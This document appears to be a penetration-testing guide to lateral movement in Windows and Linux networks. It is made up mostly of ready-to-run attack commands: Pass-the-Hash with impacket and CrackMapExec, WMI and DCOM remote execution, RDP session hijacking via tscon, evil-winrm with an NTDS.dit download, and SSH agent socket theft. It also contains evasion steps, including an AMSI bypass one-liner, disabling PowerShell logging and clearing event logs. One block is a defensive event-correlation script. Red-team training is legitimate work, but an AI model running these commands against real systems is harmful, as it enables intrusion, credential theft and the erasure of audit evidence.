Lateral Movement Techniques: Pass-the-Hash, WMI, PSExec, and RDP Hijacking
Lateral movement is the phase of a penetration test where you pivot from one compromised system to another, expanding your foothold across the network. The ability to move laterally — and do it quietly — is what determines whether a red team engagement demonstrates real business risk or stays contained to a single host. This guide covers every major technique used in modern Windows environments.
| Technique | Tool | Protocol | Requirement | Detection Risk |
|---|---|---|---|---|
| Pass-the-Hash | CrackMapExec, impacket | SMB / WMI | NTLM hash | Medium |
| Pass-the-Ticket | Rubeus, impacket | Kerberos | TGT/TGS ticket | Medium |
| Overpass-the-Hash | Mimikatz, Rubeus | Kerberos | NTLM hash → TGT | Low |
| WMI Execution | impacket wmiexec | WMI/DCOM | Admin creds | Medium |
| PsExec | psexec.py, Metasploit | SMB | Admin creds | High |
| RDP | xfreerdp, rdesktop | RDP 3389 | Cleartext creds or hash | High |
| SSH tunneling | ssh -L | SSH | SSH key / password | Low |
Why Lateral Movement Matters
Initial access is just the beginning. Real attack objectives — domain admin, sensitive data, critical infrastructure — are rarely on the first machine you compromise. Lateral movement techniques let you:
- Reach high-value targets (domain controllers, file servers, database servers)
- Collect credentials from multiple systems (expanding your hash collection)
- Establish redundant footholds for persistence
- Demonstrate true impact of an initial compromise to stakeholders
Pass-the-Hash
NTLM authentication accepts a hash directly — no need to crack it first. With a stolen NTLM hash, authenticate to remote systems as if you had the password.
```bash
# psexec.py — creates a service, returns SYSTEM shell
# Noisy: creates Windows service + file in ADMIN$
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:NTLMHASH CORP/Administrator@192.168.1.20
# smbexec.py — executes commands via SMB batch files, no binary dropped
smbexec.py -hashes :NTLMHASH CORP/Administrator@192.168.1.20
# wmiexec.py — WMI-based execution, semi-interactive
# Quieter than psexec, doesn't create a service
wmiexec.py -hashes :NTLMHASH CORP/Administrator@192.168.1.20 "whoami /all"
# atexec.py — executes via Windows Task Scheduler
atexec.py -hashes :NTLMHASH CORP/Administrator@192.168.1.20 "ipconfig /all"
# Spray across a subnet with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLMHASH --local-auth
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLMHASH   # domain auth
```
WMI Lateral Movement
Windows Management Instrumentation (WMI) is a legitimate management framework present on every Windows system. It leaves minimal forensic traces compared to psexec.
```bash
# wmiexec.py — impacket's WMI-based shell
wmiexec.py CORP/Administrator:'Password123'@192.168.1.20
wmiexec.py -hashes :NTLMHASH CORP/Administrator@192.168.1.20
```

```powershell
# Native wmic.exe (from a compromised Windows box)
wmic /node:192.168.1.20 /user:CORP\Administrator /password:Password123 process call create "powershell -enc BASE64PAYLOAD"
# PowerShell Invoke-WMIMethod
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "powershell -enc BASE64PAYLOAD" -ComputerName 192.168.1.20 -Credential (Get-Credential)
# WMI event subscription — persistence + execution
# Register a WMI event that fires on system events (stealthy persistence)
$TimerArgs = @{IntervalBetweenEvents = 3600000; TimerId = "Backdoor"}
$Timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments $TimerArgs
```
DCOM Lateral Movement
Distributed COM (DCOM) allows remote instantiation of COM objects. Several DCOM applications accept remote command execution with admin rights:
```bash
# Via impacket dcomexec.py
dcomexec.py -hashes :NTLMHASH CORP/Administrator@192.168.1.20 "whoami"
dcomexec.py -object MMC20 CORP/Administrator:'Password123'@192.168.1.20 "ipconfig"
```

```powershell
# PowerShell — MMC20.Application DCOM object
$dcom = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.20"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c whoami > C:\output.txt","7")
# Shell.Application DCOM object (ShellExecute method)
$dcom = [activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application","192.168.1.20"))
$dcom.ShellExecute("cmd","/c whoami > C:\output.txt","C:\Windows\System32","",0)
```
RDP Lateral Movement and Session Hijacking
RDP provides a graphical session. Beyond standard login, attackers can hijack existing RDP sessions without knowing the user's password — even locked sessions.
```bash
# Standard RDP connection
xfreerdp /u:Administrator /p:'Password123' /v:192.168.1.20
xfreerdp /u:Administrator /pth:NTLMHASH /v:192.168.1.20   # Pass-the-Hash
```

```
# List active RDP sessions (run on the target as SYSTEM)
query session
qwinsta
# Output:
# SESSIONNAME    USERNAME   ID   STATE
# services                  0    Disc
# console        jdoe       1    Active
# rdp-tcp#12     admin      2    Active
# Hijack a session without password (requires SYSTEM privileges)
# Switch to session ID 2 as SYSTEM
tscon 2 /dest:rdp-tcp#12
# Via PsExec to get SYSTEM first, then hijack
PsExec.exe -s cmd.exe
# Now you're SYSTEM — tscon any session without auth
# Automated via sc.exe service trick
sc create hijack binPath= "cmd /k tscon 2 /dest:rdp-tcp#12"
sc start hijack
```
PowerShell Remoting (WinRM)
```powershell
# Enter-PSSession — interactive remote PowerShell
Enter-PSSession -ComputerName 192.168.1.20 -Credential CORP\Administrator
# Invoke-Command — run commands on one or many systems
Invoke-Command -ComputerName 192.168.1.20 -ScriptBlock {whoami; hostname} -Credential CORP\Administrator
# Invoke-Command across multiple hosts
Invoke-Command -ComputerName (Get-Content hosts.txt) -ScriptBlock {Get-LocalGroupMember -Group Administrators} -Credential CORP\Administrator
```

```bash
# Evil-WinRM — full-featured WinRM shell with file transfer
evil-winrm -i 192.168.1.20 -u Administrator -p 'Password123'
evil-winrm -i 192.168.1.20 -u Administrator -H NTLMHASH
# Upload/download files from inside the Evil-WinRM shell
upload /local/mimikatz.exe C:\Windows\Temp\mimi.exe
download C:\Windows\NTDS\NTDS.dit /local/NTDS.dit
```
SSH Agent Forwarding Abuse
In Linux environments, SSH agent forwarding allows using local SSH keys on remote hosts. If you compromise a user with agent forwarding enabled, you can steal their agent socket and use it to authenticate to other systems as that user:
```bash
# Find agent sockets on a compromised Linux host
find /tmp -name 'agent.*' 2>/dev/null
ls -la /tmp/ssh-*/
# Hijack an agent socket (need access to it — same user or root)
export SSH_AUTH_SOCK=/tmp/ssh-abc123/agent.1234
ssh-add -l   # list identities in the agent
# Use the agent to authenticate to other systems
ssh -A <user>@<other-host>   # connects using hijacked agent
# If you're root, you can hijack any user's agent
# Find the process owning the agent
ls -la /proc/*/fd | grep agent | awk '{print $9}' | xargs ls -la
```
Logging Artifacts and Detection Evasion
Understanding what traces each technique leaves helps you choose the right tool for the engagement's stealth requirements:
- psexec — Event IDs 7045 (service install), 4624/4648 (logon), ADMIN$ share access. Very noisy.
- wmiexec — Event ID 4624 (logon type 3), WMI activity log. Moderate noise.
- smbexec — Event IDs 4624, 4688 (process creation). Uses batch files in %SYSTEMROOT%.
- DCOM — Event IDs 4624, 4688. Harder to distinguish from legitimate DCOM traffic.
- WinRM/PSRemoting — Event ID 4624 (logon type 3), PowerShell operational logs, WSMan logs.
- RDP — Event IDs 4624, 4778 (session reconnect), RDP-related event log.
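From the defender's side, the artifact list above maps directly onto correlation rules. The Python below is an added example (not code from the original page): it runs three such rules over constructed sample event records, using simplified field names rather than the real Windows event XML schema.

```python
# Added example: toy correlator over constructed Windows event records.
# Field names (id, host, logon_type, auth, src, share, service, image, session)
# are simplified assumptions, not the real Windows event XML schema.

# Constructed sample events, following the artifact list above:
#   4624 type 3 NTLM network logon, 5140 ADMIN$ share access, 7045 service
#   install (psexec / tscon trick), 4778 RDP session reconnect, plus a benign 7045.
SAMPLE_EVENTS = [
    {"id": 4624, "host": "SRV01", "logon_type": 3, "auth": "NTLM", "user": "Administrator", "src": "10.0.0.5"},
    {"id": 5140, "host": "SRV01", "share": "\\\\*\\ADMIN$", "user": "Administrator", "src": "10.0.0.5"},
    {"id": 7045, "host": "SRV01", "service": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"id": 7045, "host": "SRV02", "service": "hijack", "image": "cmd /k tscon 2 /dest:rdp-tcp#12"},
    {"id": 4778, "host": "SRV02", "user": "admin", "session": "rdp-tcp#12", "src": "10.0.0.5"},
    {"id": 7045, "host": "SRV03", "service": "Spooler", "image": "%SystemRoot%\\System32\\spoolsv.exe"},
]


def correlate(events):
    """Return (host, rule, detail) alerts for the lateral-movement patterns listed above."""
    # Sources that performed a network NTLM logon anywhere: the usual Pass-the-Hash footprint.
    ntlm_sources = {ev["src"] for ev in events
                    if ev["id"] == 4624 and ev.get("logon_type") == 3 and ev.get("auth") == "NTLM"}
    # Hosts whose ADMIN$ share was accessed over the network (psexec drops its binary there).
    admin_share_hosts = {ev["host"] for ev in events
                         if ev["id"] == 5140 and ev.get("share", "").upper().endswith("ADMIN$")}
    alerts = []
    for ev in events:
        host = ev["host"]
        if ev["id"] == 7045:
            image = ev.get("image", "").lower()
            if "psexesvc" in image:
                # Service install pathed like PSEXESVC; ADMIN$ access on the same host strengthens it.
                detail = "with ADMIN$ access" if host in admin_share_hosts else "service only"
                alerts.append((host, "psexec_service_install", detail))
            elif "tscon" in image:
                # A service whose binary path invokes tscon is the sc.exe hijack trick, not admin work.
                alerts.append((host, "rdp_session_hijack_via_service", ev["image"]))
        elif ev["id"] == 4778 and ev.get("src") in ntlm_sources:
            # RDP reconnect from a source that also did network NTLM logons: same operator moving on.
            alerts.append((host, "rdp_reconnect_from_ntlm_source", ev.get("session", "")))
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The benign Spooler service install on SRV03 produces no alert, which is the point of keying on the image path rather than on 7045 alone.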
```powershell
# Reduce detection footprint:
# Use HTTPS for WinRM (port 5986) to avoid plaintext capture
# Disable PowerShell logging temporarily (requires admin):
Set-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Name EnableScriptBlockLogging -Value 0
# Use AMSI bypass before loading tools
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Clear event logs (very noisy — flags defenders)
wevtutil cl System
wevtutil cl Security
wevtutil cl "Windows PowerShell"
```
For the credential sources that fuel lateral movement, see our Active Directory Penetration Testing guide covering Kerberoasting, AS-REP Roasting, and DCSync. SMB-specific techniques (including relay attacks) are in the SMB Exploitation Guide. Use the Active Directory Generator to build lateral movement command chains for your specific scenario.